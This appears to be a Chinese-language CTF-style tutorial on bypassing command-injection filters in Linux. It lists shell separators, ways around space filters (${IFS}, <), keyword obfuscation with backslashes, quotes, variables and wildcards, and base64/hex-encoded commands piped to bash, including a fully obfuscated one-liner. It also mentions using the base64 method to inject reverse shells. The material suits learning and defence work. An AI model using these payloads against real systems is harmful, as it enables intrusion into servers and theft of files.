Linux下命令执行绕过技巧

一，符号绕过

1-1 分号绕过
用;号隔开每个命令，每个命令按照从左到右的顺序执行，彼此之间不关心是否失败，所有命令都会执行。

cat /etc/passwd;ls -l

1-2 管道符 | 
Linux所提供的管道符“|”将两个命令隔开，管道符左边命令的输出就会作为管道符右边命令的输入。

cat /etc/passwd | grep bash | wc -l

1-3 & 
格式： command1 & command2

&放在启动参数后面表示设置此进程为后台进程，上面的命令会先执行command2，再执行command1

ping -c 1 baidu.com & ls -l

1-4 && 
格式: command1 && command2 [&& commandx]

&& 表示前一条命令执行成功时，才执行后一条命令

1-4-1 第一种情况
第一个命令错误，第二个命令不会执行 

如：/etc/aini 不存在就会报错，后面的ls也不会执行

cat /etc/aini && ls -l

1-4-2 第二种情况
 所有命令都正确

pwd && ls -l && cat /etc/passwd

1-5 || 
格式：command1 || command2 [|| commandx]

跟&&符号相反，前面那条命令为假才会执行后面的命令

只要有一个命令返回真（命令返回值 $? == 0），后面的命令就不会被执行。–直到返回真的地方停止执行。

cat /etc/aini || pwd
第一个命令结果为假，所以继续执行第二个命令

1-6 绕过空格
1-6-1 {}绕过
{cat,etc/passwd}

1-6-2 ${IFS}，$IFS$9，${IFS} 绕过
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat${IFS}flag.txt

1-6-3 <  绕过
cat<flag.txt

1-6-4 <> 绕过 
cat<>flag.txt

1-7 对关键字的绕过
1-7-1 （\）
比如会对cat falg 等一些常用关键字进行检测，可以用 \ 绕过
原理就是\转义符号只对一些特殊符号转义，对字母转义跟不转义效果一样
c\a\t<>f\l\a\g.t\x\t

1-7-2 '' 绕过
cat fla''g.php

1-7-3 双''来字符串拼接绕过
'fl' + 'ag'  = 'flag'
其实等于
'fl''ag' = 'flag'

1-7-4 变量绕过 
a=fl;b=ag;cat $a$b.php

1-8 通配符绕过
1-8-1 ? * 来绕过
?在linux里面可以进行代替字母
*在linux里面可以进行模糊匹配

cat<>fl*
cat flag?txt

1-8-2 [范围] 或 {f..h} 来绕过
[a-z]  表示匹配 a~z 

{f..h} 表示f~h 无论是否匹配成功都匹配一遍

cat fla[f-h].*
 分别匹配到了flag.txt和flag.php  

1-9 内联使用
1-9-1 `` 绕过
`` 里面的命令优先执行 

cat `ls | grep fla`
 分别匹配到了flag.txt和flag.php 

1-9-2 $() 绕过
cat $(ls | grep fla)

二，编码绕过

2-1 base64编码绕过 
经常用此方法来给对方服务器注入反向shell命令

echo Y2F0IGZsYWcudHh0 | base64 -d | bash -i

综合利用
1，绕过空格
2，绕过关键字过滤
3，编码

\e\c\h\o${IFS}Y2F0IGZsYWcudHh0${IFS}|${IFS}\b\a\s\e\6\4${IFS}-\d${IFS}|${IFS}\b\a\s\h${IFS}-\i

2-2 hex编码绕过 
2-2-1 熟悉xxd命令
  -a          缺省忽略转换: 使用‘*’替换空行.
   -b          二进数数据转储 (与 -ps,-i,-r不兼容). 默认为16进制.
   -c cols    每行多少列octets（特制8比特的字节）. 默认为16列(-i: 12, -ps: 30).
   -E          使用EBCDIC字符集. 默认为ASCII字符集.
   -e          小端模式转储 (与 -ps,-i,-r不兼容).
   -g          在正常输出中，每组八位字节数. 默认为2个 (-e: 4).
   -h          输出此帮助.
   -i          使用C语言文件样式输出.
   -l len      在len个八位字节后停止.
   -o off      在off个偏移量后开始输出.
   -ps         以在行后添加16进制转储内容的格式输出.
   -r          逆向操作: 转换(或修补) 十六进制内容为二进制内容.
   -r -s off   在off个偏移量后开始转换16进制内容为二进制内容
   -s [+][-]seek  start at <seek> bytes abs. (or +: rel.) infile offset.（没看懂）
   -u          使用大写字母进行十六进制表示.
   -v          显示版本: "xxd V1.10 27oct98 by Juergen Weigert".

2-2-2 例子
echo 63617420666c61672e747874 | xxd -r -p|bash